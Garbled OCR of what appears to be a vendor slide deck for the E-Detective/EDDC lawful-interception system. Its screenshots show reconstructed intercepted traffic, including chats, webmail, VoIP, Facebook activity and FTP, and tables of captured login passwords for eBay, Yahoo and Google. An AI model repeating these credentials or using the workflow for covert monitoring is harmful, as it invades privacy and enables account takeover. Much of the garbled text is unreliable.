383. 2010-01-04 20:55:59 192.168.1.10 DI AddThis || tetestrategies' iss World — | 
Now that most nations of the world require lawful interception support of VolP and other mee your ad bote > z 
382. 2010-01-04 20:55:33 192.168.1.10 H ST701 sed ses IS We Sg 2007 is "gi edem 
381. 2010-01-04 20:55:30 192 .168.1.10 H blogs.str| ` Ee chasms om lawful intercept ata beten 
information creation to investigator knowledge to actionable ... 
380. 2010-01-04 20:55:30 192.168.1.10 EJ MiniRazq iore tci o RR 
IO 204 na na na, CEA AOD ACH 4 an MI äi cken 4 TeleStrategies' ISS World Americas - Intelligent Support Systems ... = 
Mu 123 »mEnterPage| [ Go |] | = s t Page 1 
www.issworldtraining.com/ISS_WASH/ - Cached 
TeleStrategies' ISS World Europe - Intelligent Support Systems for ... 
ISS World® Programs present the methodologies and tools to bridge the chasms from lawful 
intercept data gathering to information creation to investigator ... 
www.issworldtraining.con/ISS EUROPE/ - Cached 


Sample: Social Networking Sites - Facebook 


A M CASE RESULTS | E^ JR :M SETTINGS 


Ze default | C8:0A:A9:F8:08:F1 FACEBOOK 


Facebook © Wall © Chat © Game | Every Page 
No. Date-Time Account User Handle Content Method ^ 
T. 2011-08-03 10:03:11 192.168.1.2 696045329 Profile | Wall GET 

2. | 2011-08-03 10:00:50 192.168.1.2 696045329 Profile | Wall | Frankie Chan GET 

3. 2011-08-03 10:00:46 192.168.1.2 696045329 Profile | Wall GET 

4. 2011-08-03 09:59:53 192.168.1.2 696045329 Profile | Photos | Photos GET 

5. 2011-08-03 09:57:57 192.168.1.2 696045329 Profile | Wall | 8 3 GET 

6. 2011-08-03 e^ ë — GET 

T. 2011-08-03 Frankie Chan GET i 
8. 2011-08-03 GET 

9. 2011-08-03 ( Principal Solutions Architect at Decision GroupStudied at Nanyang Technological UniversityLives in Singapore, SingaporeFrom GET 

40. 2011-08-03 Kuching, MalaysiaBorn on October 13, 1982@Add languages you knowEdit Profile GET 

11. 2011-08-03 GET 

12. 2011-08-03 GET 

13: 2011-08-03 GET 

14. 2011-08-03 GET 

15. 2011-08-03 GET ia 
16. 2011-08-03 GET 

Af: 2011-08-03 GET D 

Wa 12 bh Enter Pd Frankie Chan likes a link. ye 2 Current Page 1 


Player Profesional Nak Pakai Baju Pon Susah | GelakJE! 
view.my 


Apa yang susah sangat nak pakai baju training tu?? ! HAHA!! 


-Sample: HTTP Video Streaming (Youtube etc 
m 


A HOME | (£j CASE RESULTS | & SYSTEM SETTINGS | ËB SYSTEM STATUS | E REGISTRATION 


BB default | «p. 00:24:21:A1:92:7F | Video Stream | 


PM video Stream 


No. Date-Time Account HOS File Name 

29. v16.Iscache3.c.... + 

28. r3.sin2.c.youtu... 4 

at. v9 Iscache6.c y... 4 

26. v19.Iscache5.c.... 4 

25. v24 Iscache6.c.... 4 

24. v20.lsc ic) player.swf (application/x-shockwave-flash Object) - ... 

= 10 ec! ` ` http://192.168.1.12:888/general/common/decode/http/player.s 5/7 | 


22. v3.Iscaq 


—= Ew 


21. v24 Isca 


Hmm...Hacking Other 
Computers | See?? We'll / 
it could be just that...(for 

info purposes only) 


20. v9.Iscaq 
19. v11.Iscá 
18. v15.Isc 
1T. v16.Isca 


16. v13.Iscá 


Wal »mEnterPage| | Ge ] 


Transferring data from 192.168.1.12... 


SR. tal 


gm Disabled 


Record/Page : | 
kasa Í le ^ 


16.28M 
2.70M 
1.56M 


12.87M 


m 


2.02M 


1.94M 


3.21M 


1.25M 


458.43K 


967.50K ` 

340.99K 

693.27K 
5.80M 
6.09M _ 


21 Total Page 1 Current Page 1 


E 
-- Sample: Voice over IP (VoIP) RTP Calls =- 
m (EE 


fa Home! EI CN system settincs |  systemstatus| [RÝ REGISTRATION 


W VOIP Record/Page : [ 20] ISS 
NO. Date Time Account S. Number D. Number Mode Type CODEC VOIP File TUTTA 
4. 2 g 4 58 Sec 
+ & & + 50 Sec 
2 a a 4 1 Min 3 Sec 
IK « 1 b Enter Page [_ | Total 3 Total Page 1 Current Page 1 


be - e E OUR TRI e mS] | 


File Download 


Do you want to open or save this file? 


Name: 8610044420 8610044421.wav 
WAV Type: Wave Sound, 301KB 
From: 192.168.1.60 


| 5 While files from the Intemet can be useful, some files can potentially 
L iy harm your computer. If you do not trust the source, do not open or 
= save this file. 


Sample: HTTPS Username and Password 


E oon] Ü systemsettincs| [3 sYSTEMSTATUSI [W REGISTRATION 


Raw Data Set ID : 
Refresh | Case : default e Record/Page 
N/A : 
Di om B| n - "A e =l bel Export 
Display by MAC © Ip [ Search ] — eae 


IP t Mid ASSO B @ r B ç Q b 9 OF Sod dia p. Z 
192.168.6.23 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 Of Din 10 
192.168.6.8 Ek E Oe COCO. Oar FE, K s E (eet s Oe Fee 0 0 0 0 0 4 Of 0]0 E 
192.168.1.132 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 O 0 0 0 0 0 3 Of 010 3 
192.168.1.35 0390019558010 0 Te 0 9970.00 779779 70:2 a 290/1085 .102 134109 10:080] b I 0 1254 
192.168.1.34 0 0 064 5 0 0 0 0 0 0 0 0 0 0. 0 01535 158 3 0 4 Of 2 f 8 1781 
60.250.163-131 0. 0 “0 0) 0 0 0 0-00 0 0 0 0 0 0 90 0:01:70. 0 4 0| OF 0 í 
10.0.0.11 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 13 0 1 0 0 0 Of 0J0 14 
10.0.0.10 0 0 0 Set tel, De, GE, Le, eh, Ke 7027058.0 00502 389.7 38: 3 OP OO! 20770] 5323 E 497 
Wal » h Enter — Total 8 Total Page 1 Current Page 1 


fa Home: [> o | 8 systemsettincs; RB systemstatus | [W REGISTRATION 
A default |g 192.168.1.35 |Account/password | 


€ Account/password Record/Page : [ 29] 
No. Date-Time Account User Password Server 

8. 2010-11-07 15:41:04 192.168.1.35 bobuuu eeee http-//signin.ebay.com.sg/ws/eBayISAPI.dll?co part... 

T. 2010-11-07 15:40:16 192.168.1.35 wedetective2 jmyohxbc http-//login.yahoo.com/config/login? 

6. 2010-11-07 15:40:04 192.168.1.35 decisiongroup2010 jmyohxbc http-//www.google.com/accounts/ServiceLoginAuth 

3. 2010-11-07 15:24:00 192.168.1.35 decisiongroup2010 jmyohxbc http-//www.google.com/accounts/ServiceLoginAuth 

2. 2010-11-07 15:23:43 192.168.1.35 wedetective1 jmyohxbc http-//login.yahoo.com/config/login? 

1. 2010-11-07 15:23:36 192.168.1.35 wedetective1 jmyohxbcdecision http://login.yahoo.com/config/login? 


Wal b bi Enter Page Se [ G ] Total 6 Total Page 1 Current Page 1 


Sample: Incomplete Connections 


|_| http://192.168.1....n/frame/frame.php | + - 


ft HOME CASE RESULTS | @ SYSTEM SETTINGS | & SYSTEM STATUS | Z REGISTRATION 


2 default + 00:24:21:A1:92-7F | Incomplete Records 


ES Incomplete Records Record/Page : | 50 [_ Confirm | 


No. Date-Time Source MAC Source IP Dest. IP S.Port D.Port Comment Incomplete Records 
1. 2010-01-04 18:34:58 00:24:21:A1:92:7F 192 168.111 203.175.16236 1973 ^ 80 Lost HTTP Header INCOMPLETE_yKJsT9 dat 
W“ 1 b bi Enter Page | Total 1 Total Page 1 Current Page 1 
101 Binary Viewer : C Users|Frankie Desktop INCOMPLETE. yKJsT9.dat emm 
File Search View Help proXoft 4“ 
Y / o 
Address (Hex) Text (ASCII) 
Incomplete connection BEER KELES demi scimg SES — 
' 00000050 €D 57 images/stories/m 
iH H 00000060 64 s odule/mapsandbro 
sessions can be viewed — Ta a 
e e 00000080 74 D lt-"mapsandbroch 
by binary-text viewer Vie s vallas 


000000A0 
000000B0 
000000CO 
000000D0 
000000E0 
000000F0 
00000100 
00000110 
00000120 
00000130 
00000140 
00000150 
00000160 


4 


File Name: INCOMPLETE yKJsT9.dat | Size: 4,206 bytes 


le-"mapsandbroch 


o 


ures-02.jpg" hei 
ght-"114" width- 
"140" /></a>.... 


D 
MO) om om om 
[zl 


N 


o 


JN N N O N HHH OV 
D 


o 


</div>... 


o om N N 
ao N NON e 


EJ 


o 


<div style-"cle 


ar:iboth; "></div> 


N OF 
o nj 
Oo 
IN 


o 


«/div». 


o 
o 


<div 


class="clear"></ 


o 
o 


div». «/div». 


J Ñ N NN 
N 
Ñ om H 
O 


m 0| 
O 


</div>. <!— 


A 
Ñ M 


o s 


/wrapper..  begi 


Search — Free Text (Key Words) and Advanced 


| ` ` http://192.168.1....n/frame/frame.php | + | P 


ft HOME | (£j CASE RESULTS | Ë SYSTEM SETTINGS | B) SYSTEM STATUS | E REGISTRATION | 


Refresh | Case : default v Daka A M Record/Page.| 50 [confirm | 
aT byz..Q 


E ES E - GEES d D BG u 


192.168.1.11 7 0 0 0 0 
192.368-3-10 C T Y r q V Q 8 R See S08 16s. 09.170. 70 


wa 1 »»EnterPage[. | Go | Free Text (Key Words Search) 


x 


Lk) Sm USD Keen, ert 08 70 0] £0 20m s 
Total 2 Total Page 1 Current Page 1 


Search Parameters Search Category 

Date : 

Time : 

Source IP : 
Email Address : | . 


m 


T Advanced Search 
LUTTE (Conditional Search) 


FTP Server : 
FTP User : 
P2P Tool: 

P2P File : 
Game Name : 


MSN Account : 2. 
User Handle | Participants 


ICQ Account : |2. 


User Handle [C Participants 


Offline Packet Reconstruction Series 
E-Detective Decoding Center 
EDDC (for All) & EDDC-LEMF (for LEA) 


q 


Introduction to EDDC 


€ EDDC is a Unix/Linux based system specially designed for Manual Offline raw 
data (PCAP) files reconstruction. 


* It allows Administrator to create different project/case for different 
user/investigator (with different level of authority) to conduct Internet raw 
data parser and forensics analysis task on the system. 


** The system is able to reconstruct Internet application/services like Email 
(POP3, SMTP, IMAP), Webmail (Yahoo Mail, Gmail, Hotmail etc.) IM (Yahoo, 
MSN, ICQ, QQ, UT, IRC, Google Talk, Skype Voice Call Log), File Transfer (FTP, 
P2P), HTTP (Link, Content, Reconstruct, Upload/Download, Video Stream), 
Telnet, Online Games, VoIP (Yahoo), Webcam (Yahoo, MSN). 


** EDDC can be used by all group of users who wish to view the content of the 
network traffic with pre-captured raw data files. It is designed for private and 
public sectors users. 


User/Case Management - Offline Internet Raw Data 
Parser/Reconstruction — Search Function — Export/Backup 


EDDC Application and Implementation Diagram 


Offline Raw Data Decoding and Reconstruction system. 
Comes with User and Case Management functions. 


Collect, === n 
Import ELSE == 
Raw Data EE == 
or Case 1 — L = = 
Investigator 1 — - — 


Case 1 Case 1 Results 
^3 


ZU 


E E & @ £ Dn 


, Z m=. EDDC/XDDC Bu. —— == 
Collect, RN 2 ELE = 
Import AFE == 

Investigator2 Raw Data =: = =E] 
Case 2 For Case 2 . —: 


Case 2 Results 
Reconstruct various Internet Protocols/Service Types 


Introduction to EDDC-LEMF (1) 


** As a lawful interception solution for parsing PCAP file format 
or raw packet data stream from frontend mediation 
platforms or broadband service routers. 


** Decoding all data packets associated with protocol based on 
service port number and session. 

** Saving un-decoded data into specified directory in PCAP 
format. 


% Output decoded data into database and associated 
multimedia files with XML files in predefined way. 


** Compliance with ETSI TS 101 671 and ETSI ES 201 671. 


Introduction to EDDC-LEMF (2) 


** Input data will be: 
=" XML description file and PCAP files 
=" Data stream (must specified in advance) 
** All output data will be saved or processed by case ID 
% FTP server and client services launched 
** Case management interface 


** Lawful enforcement management utility for cyber 
investigation (LEMF) 


Implementation of EDDC-LEMF 


Telecom, 

International Optional 
gateway station 

or ISP sends XML 


Optic fiber 


er aqa ° — Saç Data Retention 

Platform Mediation Management 

; Platform System with 
Multiple ED/LEMFs 
1. Connection : > \ 

- Directory Tree v BS 

- File Name Convention /— A ED/LEMF System 

- XML description file ⁄ | 

- PCAP Files upload (rl o 

` Analysis Server (Data Mining) 

2. System: 


3. Connection : 


-FTP with Mediation Platform 
-FTP 


-Case ID Management 

-Web —based Lawful Enforcement 
Management Utilities and System 
Administration 

-User Manual 


EDDC Dashboard/Homepage 


dr Favorites | @ admin (Admin) m ~ L3 dA v Pager Safetyy Tools v @~ ” 


Case Results | Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup Download or Burn ISO Logout | 
Case Name: default > Raw Data Import Filter: N/A X Import Record | Build Backup ISO | 


i^; 
REPORT E-MAIL CHAT FILE TRANSFER GAME HTTP TELNET VOIP SSL FUNCTION OK 


: Total Throughput Statistical Report a 
Top-Down View Report Online User List 


( 2009-06-18 18:34:31) 


Daily Traffic Weekly Traffic Total Traffic 
Service Category 2009-06-18 2009-06-11 ~ 2009-06-18 
Quantity Throughput Report Quantity Throughput Report Quantity Throughput Report 
Summary 222 93,341 KB! |l, 250 93700 KB |l, 13,951 390.555KB iii, 
Ta POP3 0 OKB |l, 0 OKB | 66 16,043 Kg lil. > 
Fa IMAP 0 OKB ll 0 3 
EMAIL < SMTP 0 OKB lil. 0 
0 OKB lil. 0 


3 Webmail(Read) 


ap (^ ACCOUNT User All Traffic Top n 
Throughput Statistical Report 
192.168.1.142 Who is ? 115,532 KB Protocal Daily Weekly | Summary 
192.168.1.33 Who is ? 102,766 KB Protocal Daily Weekly | Summary 
192.168.1.10 Who is ? 96,256 KB Protocal Daily Weekly | Summary 
192.168.1.11 Who is ? 32.401 KB Protocal Daily Weekly | Summary 
192.168.1.9 Who is ? 31,845 KB Protocal Daily Weekly | Summary 


d 
o 
"o 


«D c) — o CO» +£ C) N = 


FFIFIFIFIFIF F F F F F FPF 
| 


192.168.1.179 Who is ? 9.905 KB Protocal Daily Weekly | Summary ili. 
192.168.1.132 Who is ? 951 KB Protocal | _ Daily Weekly | Summary 
192.168.10.10 Who is ? 359 KB Protocal Daily Weekly | Summary Mh. 
192.168.1.13 Who is ? 284 KB Protocal | Daily Weekly | Summary lili. 
66.94 230.122 Who is ? 210 KB Protocal Daily Weekly | Summary 
68.142.233.22 Who is ? 46 KB Protocal | Daily Weekly | Summary Ili. 
192.168.6.8 Who is ? 0KB Protocal | Daily | Weekly | Summary l, 25 122.052 KB 
FILE TRA 2423.70.11 Whois ? 0KB Protocal  Daiy J Weekly | Summa "mw 


12 48,701 KB 


60.250.163.131 Who is ? 0 KB Protocal Daily Weekly | Summary 
220.141.42.6 Who is ? 0KB Protocal Daily Weekly | Summary 


192.168.6.23 Who is ? 0 KB Protocal Daily Weekly | Summary 


Sample Reconstruction: Email (POP3) 


Case Results Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Name: default ~ Raw Data Import Filter: N/A Y Import Record | Build Backup ISO | 
e 
REPORT [|E-MAIL [CHAT FILE TRANSFER GAME HTTP TELNET VOIP SSL FUNCTION | gU 
Éropa] `  EveryPage| 10| 
No. O Date-Time Account Sender Receiver CE Subject Login Password 
26. € 20080702 — 45468111 fankiedecision@gma... Ë UN finds world mic i suppot@et eddecision: 
; 10:28:43 .168.1. ankie.decision@gma... support@ed-system.sg nds world economic inse... suppo ision: 
2008-07-02 . B . —— —— 
25. 10:28:43 192.168.1.11 wedetective2@hotmail... support@ed-system.sg Africa supportGe« — eddecision: 
24. M T 192.168.1.11  fransyinmy@yahoo.com wecotectine2@@hotimel.. support@ed... Bragil’s new drunken dri... support()e« — eddecision: 
2008-07-02 B "mE 
23 10:28:43 192.168.1.11 support@ed-system sg support © https//192.168.1.12/generəl/common/show-msg php? PROG-maimall mag phpacIDX- 248 SQLI- Select - Windows Internet Explorer am eddecision: 
22 Sen Are 192.168.1.11 sharon jsm.com a : - === — —— = eddecision: 
10:28:43 i 7 ron@neujsm.co list@neu 24 Brazil's new drunken driving law stirs discontent raiápg——|—=—p nl eddecision. 
2008-07-02 B Subject Bani new drunken diving lv sis discontent Mi [eddecision: 
21 10:28:43 192.168.1.11 support@ed-system.sg supportGl| se : SS eddecision: 
20 2008-07-02 492 468.1.11 gandong2004@mailua.. H. | Rit NR eddecision: 
10:28:43 enquiry(Q| ges 
2008-07-02 Date 2008-07-02 18:24:04.0 Ë REFIERE 
" 10:28:43 Vase Get z: - eddecision: 
2008-07-02 — d 
e 10:28:43 ER rt G|] Susana ` mà eddecision: 
17. 2008-07-02 192.168. BRASILIA - POLICE have arrested hundreds of Brazilian drivers under a tough new law designed to crack down on rampant drunken driving, but bar | eddecision: 
10:28 43 rt owners are working to overturn the measure and many of their clients are flouting it. i 
I  « 1 2 34 56 T WW a et rrent Page 5 
An estimated 45 per cent of those 36,000 annual deaths are due to drinking, the group says. 
The law, which took effect on June 20, effectively bars drivers from drinking and imposes stiff fines. One beer is enough to exceed the new limit of 0.2 
decigrammes of alcohol per litre of blood. The old limit was 0.6 decigrammes. 
Violators face at least a USS600 (S$818) fine, a one-year suspension of driving privileges and temporary impoundment of their cars. W 
Heavy drinkers can be imprisoned. 
In 10 days federal police, who monitors the country's main highways, have arrested some 300 motorists and fined many more even though experts say 
they are undertrained, underfunded and underequipped. Some states only have a handful of breathalysers. e 
Done = @ Internet | Protected Mode: Off G R10% + 


@ Internet | Protected Mode: Off f R10% ~ 


Sample Reconstruction: Email (SMTP) 


Case Results 


Case Management | Import Analysis | Auto Import Analysis || User Management | System Setup | Download or Burn ISO | Logout | 
Case Name : default ~ Raw Data Import Filter ` N/A Import Record | Build Backup ISO | 


REPORT [Ema] CHAT FILE TRANSFER GAME HTTP TELNET VOIP SSL FUNCTION LS, 

al Every Page| 2 Confirm | 

No. O Date-Time Account Sender Receiver CC BCC Subject Login Password 
9. jet flyy hye decision com, edetective@163.com ^ — king0613Qyy... rr poses lights NWA N/A 
8 perg flyy "e— — vincentyao(g decision. a REM: ER. ERIS NA ` N/A 
7. Ü — vic icQdecimun com.tw Ryy@decision.com.tw... Aree Fen N/A 
6 Ü get vic Ge tw flyy@decision.com.tw M. N/A N/A 
5. € Tar vic PET, flyydecision.com.tw... Georg — N/A N/A 
4. See peter — 3 com... flyyGdecision.com.tw... BSH ERR AT N/A N/A 
3. 0 m decision —— decision@ed-system.s... support@ed MY Email N/A N/A 
2 0 poe decision PETRUM, DYE ;,,Jecisionged-system.s.... _ New York N/A N/A 
1 d pee decision meret os ; d Captured N/A N/A 

Wa 12 bh | Total 19 Total Page 2 Current Page 2 


File Download 


Do you want to open or save this file? 


Name: f742578d0c3e6b94.doc 
Type: Microsoft Office Word 97 - 2003 Document, 51 3... 
From: 192.168.1.12 


L Ge JL Se J[ cs / 


[V] Always ask before opening this type of fie 


New York City restaurants go trans-fat-free 
NEW YORK - ONE New York City chef spent a year mastering a trans-fat-free version of his sfoghatella pastries. Boston Market 
restaurants have introduced a trans-fat-free chicken pot pre in New York before taking it to other United States cities. 


All that work was in preparation for New York City's ban on trans-fats in restaurants, which took full effect on Tuesday, and is the first of 


While files from the Intemet can be useful, some files can 
9 e o compu EI dT its kind among major US cities. The move follows the city's 2003 ban on public smoking 


can potentially 
. F you do not trust the source, do not open or 
save this file. What's the risk? 


Artificial trans-fats give french fries their crunch and pie crusts their flakiness and chefs have been figuring out how it was done before 
trans-fats came into wide use during World War E, when margarine became a substitute for rationed butter and Crisco became a 
staple in US kitchens 


Artificial trans-fats, which also are known as partially hydrogenated vegetable oil, have just as many calories as other fats but clog L| 
arteries in the same way that saturated fats like butter and lard do. 


A year ago, New York restaurants were banned from using the artery.clogging fats in cooking oils and spreads. On Tuesday, all trans- 
fat products were banned, although the city will allow a grace period before issuing fines up to US$2,000 (S$2,700) 


Ms Laura Stanley, a former senior editor for Martha Stewart Living Omnimedia who heads the city's Trans-Fat Help Center, a chnicto — - 
Done e Internet | Protected Mode: Off fa Alto + | 
Ka — — mm — ——— === 


Sample Reconstruction: Webmail (Read) 


Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 


Case Name: default > Raw Data Import Filter: N/A X Import Record | Build Backup ISO | 


x 
REPORT [E-MAIL] CHAT FILE TRANSFER GAME HTTP TELNET VOIP SSL FUNCTION KE? 
| Webmail Token Analyzer í í í í í í í í í í í í í í em Every Page [_*0|[ Confrm | 
No. H Date-Time Account Sender Receiver cc Subject Webmail Type 
21 2008-07-02 10:26:46 1924684341 — wedetective2@hotmail... frankie deci... BEES as groon on gak GMail 
18. 2008-07-02 10:24:00 192.168.1.11 pics for you to smile Windows Live 
17. 2008-07-02 10:23:49 192.168.1.11 Human genome changes with age Windows Live 
16. 2008-07-02 10:23:44 192.168.1.1 FW: Auditing Tool Windows Live 
15. 2008-07-02 10:23:27 192.168.1.1 Brazil's new drunken driving law stirs Windows Live 
discontent 
B. 2008-07-02 10:21:12 192.168.1.11 registration@youtube... fransyinmy@y.. bis ve m YAHOO2.0 Mail 
p : ; Fw: fatar Airways to increase flights : UM 
12. 2008-07-02 10:21:12 192.168.1.11 support@ed-system.sg fransyinmy@y... support@ed... Gu cha ML mda... YAHOO2.0 Mail 
11. 2008-07-02 10:21:12 192.168.1.11 j i iving party YAHOO2.0 Mail 
10 2008-07-02 10:21:07 192.168.1.11 | & A Playoffs, NFL Drat y uoo Mail 
le Header... 
9. 2008-07-02 10:21:07 192.168.1.11 — =a aranes Msiatolet — V AHOO2.0 Mail 
FROM: registration@youtubeclipextractor.com —— 


Mau 123456789 bh ATE / TIME : 2008-07-02 10:21:12 otal 88 Total Page 9 Current Page 8 
TO: fransyinmy@yahoo.com 
SUBJECT : Your YouTube Clip Extractor registration 


Hi frank, 

be sent directly to the page confirming your registration and your software will be activated. To activate 
YouTube Clip Extractor, please click here now. 

Enjoy A. 


The YouTube Clip Extractor team 
http://www. YouTubeClipExtractor com 


@ Internet | Protected Mode: Off a Q10% e 


Sample Reconstruction: Webmail (Sent) 


Case Management| Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Name: default ~ Raw Data Import Filter: N/A X Import Record Build Backup ISO 


(^; 
REPORT [E-MAIL] CHAT FILE TRANSFER GAME HTTP TELNET VOIP SSL FUNCTION Q 
S Webmai Seni Every Pagel || Con | 
No. Date Time Account Sender Password Receiver cc BCC Subject ee 
= oo 192.168.1.10 A. vicQdecision... Fw: FW ` 472 P90 EH BEC... HiNet Mail 
2008-07-02 B SS I 
E. 10:28:17 1922468441 Sonde decisiongygma... decision@ed-... Bush GMail 
84. 0 Coe: 192.168.1.11 ce support@ed-s... UN finds world economic insecurity ... GMsil 
2008-07-02 : : : 
x 10:25:28 1924684141 edetective2@hotmail... support@ed-s... Afgfa Windows Live 
19. ij poii 192.168.1.11 milan Seanad frankie.deci... N agency hails green energy 'gold ... ^ Windows Live 
20 0 8 -0 7-0 2 m [ e DEE E Ee eec - Windows Internet Explorer lëtze p , . 
M 10:22:16 Eee fransyinmy@yahoo.com Hos megohg? PROG-mailiope r : ee] Bt Irish mi.. YAHOO2.0 Mail 
84 UN finds world economic insecurity among rich, poor First || ¿Previous || Next | Les. || Bookmark, 
“4 12 9» FROM: frankie decision@gmail.com | Page 2 Current Page 2 
DATE / TIME : 2008-07-02 10:27:24 
m TO: support@ed-system.sg 
File Download 


SUBJECT - UN finds world economic insecurity among rich, poor 


Me ATTACHMENT : | 1: im 


UNITED NATIONS - RICH and poor nations have more in common this year: a growing sense of economic insecurity. 


Do you want to open or save this file? 
Name: SIAjpg 


Type: JPEG Image, 23.2KB 
From: 192.168.1.12 


( Qv Il Sw IL Cm j 


Their shared anxiety is largely due to 'trade shocks' from rising oil and food prices, rattled financial markets, natural disasters and armed conflicts, 
the UN said in its annual survey of world economic and social trends, released on Tuesday. 


F 


As usual, though, it's the impoverished who fare worse. 


m 


"The food riots that broke out in a number of countries in early 2008 have laid bare the fragility of economic livelihoods for those at the bottom of 
the development ladder.’ the report says. 


Mr Sha Zukang, the U.N. undersecretary-general for economic and social affairs, suggests nothing less than 'a global New Deal’ or Marshall Plan- 
like approach to help the world's poor, especially the 1 billion people who live on less than USS1 (S$1.36) a day. 


Í 5 While files from the Intemet can be useful, some files can potentially 
gY ham your computer. If you do not trust the source, do not open or 
= save this file. What's the risk? 


Under that plan, nations would set aside cash grants that nations could pay to each household, something along the lines of the dividends paid to 
Alaskans each year since 1980 from oil and gas money. E 


"Such measures are, of course, fraught with complications and difficulties,’ he says in the report. 


‘And asking at what level and with what resources this could be pursued as part of a wider security agenda remains an abstract policy point.’ 


The report lists 35 nations that need help because of a food crisis - led by Iraq, Zimbabwe, Swaziland, Somalia and Lesotho. In these nations, food 
insecurity is greatest because of drought and windstorms or floods and, in some areas, fighting. 


Done @ Internet | Protected Mode: Off fy > 10% ~ 


Sample Reconstruction: IM - MSN 


Case Results Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Name : default > Raw Data Import Filter: N/A v Import Record | Build Backup ISO | 


REPORT E-MAIL [CHAT| FILE TRANSFER GAME HTTP TELNET VOIP SSL FUNCTION e 
Z msn] Every Page| 2 Conírm | 
No. H Date-Time Account User Handle Participants Conversation Count 
5 H peccet 192.168.1.33 shmily.d0613(gmsa.hinet.net diesis@ms62_hinet_net Conversation 48 
4 H peig 192.168.1.33 shmily.d0613@msa hinet.net philip12129@hotmail.com Conversation 12 
3 — 192.168.1.33 shmily.d0613@msa_hinet.net dick691111@yahoo.com.tw Conversation 28 
2 d Gi 192.168.1.13 wedetective@hotmail.com wedetective2@hotmail.com Conversation ri 
1 M peg 192.168.1.11 wedetective2@hotmail.com wedetective@hotmail.com Conversation 9 
i«« 123 bhi 


Page 3 Current Page 3 


e https://192.168.1.12/general/common/show msg.php? PROGzmsn/msn msg.php& IDX-1&T SQL1-Select?520 - Windows Intern... = 
WC -a = — —_* E? 


Í ET 

1 wedetective2@hotmail.com - wedetective@hotmail.com [Es] |Previous -| [nn] 
Date-Time: 2008-07-02 10:43:23 | User Handle: wedetective2@hotmail.com Every Page:[ 2 Confirm | 
. Date-Time User Handle Message 


; gt wedetective2@hotmail.com helo 


a Seite wedetective2@hotmail.com how r u? 


3 perg wedetective@hotmail.com hi 


M 4- good wedetective@hotmail.com ` | am fine 


1 pot wedetective@hotmail.com thanks! 


2008-07-02 
- 10:43:54 wedetective2@hotmail.com i 68.7K 
port wedetective2@hotmail.com ANA = © 213.2K 


2008-07-02 10-44-46 sëch 
iK« 12 pn Total 9 Total Page 2 Current Page 1 


ernet | Protect le: ay A ` 
Inti P ed Mode: Off L^ R 100% 


File Name File Size ^ 


- 


Done 


Sample Reconstruction: IM - YAHOO 


Case Results Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
` Import Record | Build Backup ISO | 


Case Name: default > Raw Data Import Filter : N/A 
e 
REPORT E-MAIL FILE TRANSFER GAME HTTP TELNET VOIP SSL FUNCTION | KE? 


Fovasoo] ^ Download Tool w w Every Page :[10 ][ Confrm | 


No. Date-Time Account User Handle Participants Conversation Count 
9. 2008-09-22 09:40:13 192.168.1.9 superuserdemo diesis2k5 Conversation 
8. 2008-09-22 09:40:13 192.168.1.10 diesis2k5 superuserdemo Conversation 
d 2008-09-22 09:15:36 192.168.1.10 diesis2k5 test3@decision.com.tw Conversation 
6. @ 2008-07-02 10:41:50 68.142.233.22 wedetective1 wedetective2 Conversation 
5. @ 2008-07-02 10:41:36 68.142.233.22 wedetective2 wedetective1 Conversation 
4. @ 2008-07-02 10:40:51 66.94.230.122 wedetective1 wedetective2 Conversation 
3. d) 2008-07-02 10:40:42 66.94 230.122 wedetective2 wedetective1 Conversation 
2. @ 2008-07-02 10:40:06 192.168.1.11 wedetective1 wedetective2 Conversation 15 
. CEAS how msg php? PROG-yahoo/yahoo msg php& IDX-2&T SQLI- Select - Windows Internet Explorer ===] N 
1. Ú) 2008-07-02 10:40:05 192.168.1.13 wedetectived = onversation 15 
“4 1 bh 3E DateTime: 2008.47.02 10340:06 ser Handle wedetectivet = Page 1 Current Page 1 
"3 Eon — enm em Message Time started Finish Time 
2. E wedetective2 Message good morning 
e E Pom Se em | 
5, 2008-0702  Wedetectivet — Message (om fine 
6. E wedetectivet Message thank you 
* ped wedetective File MY $ 
s. TL ` wedotectivot File men Request Form. pdf 
9. prancing wedetectivet Message thank youll! 
10. Se wedetective2 Message welcome 
n DE welche! video (Ey 04156 404243. 
12, WË ` wedetectivot Video © RS 
x. DZ  Wedetectivet ` Ao @ Paroa 424105. 
M D wedetectivet ` Ado @ 04102 421105 
1s. ZU ` wedetectivet ` ze @ E — 24105 
Done T _ ER Internet | Protected Mode: Off fa v 100% v j 


Sample Reconstruction: File Transfer (FTP) 


Case Management | Import Analysis | Auto Import Analysis | User Management | System Setup | Download or Burn ISO | Logout | 
Case Name : default > Raw Data Import Filter : NA — e Import Record | Build Backup ISO | 


(e) 
REPORT E-MAIL CHAT |FILE TRANSFER [GAME HTTP TELNET VOIP SSL FUNCTION Q 
Every Page :| 10][ Confirm 


No. Date-Time Account Username Password Action FTP Server IP File Name 


5. poe 192.168.1.10 vic vic Download 192.168.1.249 Cisco lcons 1.ppt 


4. pee) 192.168.1.11 anonymous IEUser@ Download 64.7.210.151 DWA-642_ds_pdf 


3 ZEIT ` 192.168.1.11 — anonymous IEUser@ Download — 6472104541 DSN-3200-10 ds.pdf 
2008-07-02 


2 | 409 4C9 4 44 I za 64.7.270 464 DUUA 40 
1 0 P 35 d e ee Windows Internet Explorer = Eis Do sd 
1 2008-01 Gv» & = d x ERE D crowier Search rA md 
š i File Edit GoTo Favorites Hep —- ur d s 
10:35: Sk Favorites @ https://192168.1.12/general/common/download... D- > CI dh v Pager Safetyv Tock: @~ ” Do you want to open or save this file? 
i «123 Wan | Be Bem v.e. B š Name: DWA-642 ds.pdf 3 Current Page 3 
L| Type: Adobe PDF Reader, 594KB 
Wirelessly connect to the Greater wireless reception around Backward compatible From: 192.168.1.12 
Internet for work or play your home or office with 802.11g networks 


e 3 [oen ]( Sw ][ Geet ] 
> 

| Bae ————— 

p nm = [?] harm your computer. If you do not trust the source, do not open or 


save this file. What's the risk? 
